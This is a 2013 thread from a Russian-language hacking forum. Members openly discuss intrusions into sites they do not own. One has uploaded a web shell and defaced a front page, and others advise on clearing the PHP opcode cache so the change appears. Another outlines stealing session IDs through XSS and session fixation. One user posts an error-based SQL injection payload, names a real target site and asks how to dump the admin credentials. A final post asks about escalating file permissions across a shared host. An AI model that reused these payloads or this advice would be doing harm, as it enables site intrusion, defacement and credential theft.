12.03.2013, 19:11
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от qaz
я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?
посмотри с другово браузера этот же сайт, или просто очисти кеш
|
|
|
12.03.2013, 19:36
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от OxoTnik
посмотри с другово браузера этот же сайт, или просто очисти кеш
та это тут не причём, индекс действительно не изменился, вот если удалить файл то да, напишет ошибку, а от изменений ноль толку
|
|
|
|
12.03.2013, 23:26
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.
По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost
|
|
|
|
12.03.2013, 23:52
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Cennarios
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.
По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost
чего ты так рагорячился)) мы же не такие про как ты))
глянул пхп инфо, есть там apc, как там обнулить кеш?
|
|
|
|
13.03.2013, 00:23
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
погугли - apc.php manager по самому первому линку там можно скачать скрипт. Очень просто настраивается. В правом верхнем углу кнопка - clear opcode cache. Меняешь php файл. Обнуляешь кеш, заново инициируешь запуск файла в который были внесены изменения. Стоит отметить, что далее в frontend-backend данные от бэкенда попадают в тот же файловый кеш нгинкса или мемкеш. Так что если все равно не обновится значит копать в эту сторону.
|
|
|
|
13.03.2013, 00:39
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами:
8155766
Репутация:
2
|
|
Как пользоваться PHPSESSID session fixation дайте ссылку на топ
|
|
|
|
13.03.2013, 03:02
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Groove
Как пользоваться
PHPSESSID session fixation
дайте ссылку на топ
Возможный путь использования XSS:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Нахождение XSS
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Впаривание XSS
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Получение PHPSESSID
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Заход под PHPSESSID
[/COLOR][/COLOR]
PHPSESSID session fixation:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Создание своего уже[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]известного PHPSESSID
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Установка этого PHPSESSID у удаленого человека[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Впаривание[/COLOR][COLOR="#007700"])
-[/COLOR][COLOR="#0000BB"]Он авторизуется по этим PHPSESSID
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Мы заходим под уже известным PHPSESSID
[/COLOR][/COLOR]
Может использоваться как альтернатива кражи куков в некоторых случаях, при впаривани методом соц. инженерии, при отправке скомпрометированного ответа сервером.
Установка PHPSESSID может быть в параметрах методом GET, а не только через куки.
http://www.acros.si/papers/session_fixation.pdf
|
|
|
|
13.03.2013, 13:41
|
|
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами:
7002326
Репутация:
0
|
|
отправляю запрос на сервер
Сообщение от None
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
Выдает :
Сообщение от None
Table 'panel.users' doesn't exist
Сайт
Сообщение от None
http://game.parlahost.ru/
|
|
|
|
13.03.2013, 20:38
|
|
Новичок
Регистрация: 22.01.2013
Сообщений: 23
С нами:
7002326
Репутация:
0
|
|
Сообщение от panfilov1991
отправляю запрос на сервер
Выдает :
Сайт
Нужно вывести лог и пасс админа
|
|
|
|
14.03.2013, 17:16
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:
можно ли какнить изменить права на доступ с этих нулевиков в другие папки?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
